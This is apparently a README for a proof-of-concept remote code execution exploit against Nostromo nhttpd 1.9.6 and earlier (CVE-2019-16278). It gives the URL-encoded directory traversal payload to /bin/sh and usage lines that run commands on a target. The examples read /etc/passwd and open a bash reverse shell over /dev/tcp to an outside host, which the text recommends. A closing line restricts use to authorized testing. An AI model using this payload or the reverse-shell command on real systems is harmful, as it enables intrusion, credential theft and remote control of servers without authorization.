
PoC RCE exploit for Nostromo nhttpd ≤ 1.9.6
Remote Code Execution vulnerability in Nostromo nhttpd versions <= 1.9.6 via directory traversal in the HTTP request handling.
This exploit leverages a directory traversal vulnerability using URL-encoded CRLF characters (%0d) to access /bin/sh and execute arbitrary commands.
/.%0d./.%0d./.%0d./.%0d./bin/shecho\necho\n<command> 2>&1python3 cve-2019-16278.py <TARGET_IP> <PORT> <COMMAND>
python3 cve-2019-16278.py 192.168.1.100 80 "id"
python3 cve-2019-16278.py 10.10.10.10 8080 "cat /etc/passwd"
python3 cve-2019-16278.py target.com 80 "whoami"
python3 cve-2019-16278.py 10.10.10.10 80 "bash -c 'bash -i >& /dev/tcp/10.10.20.20/4444 0>&1'"
Reverse shell Recomended, sometimes this script show nothing
This tool is for educational and authorized security testing purposes only. Unauthorized access to computer systems is illegal.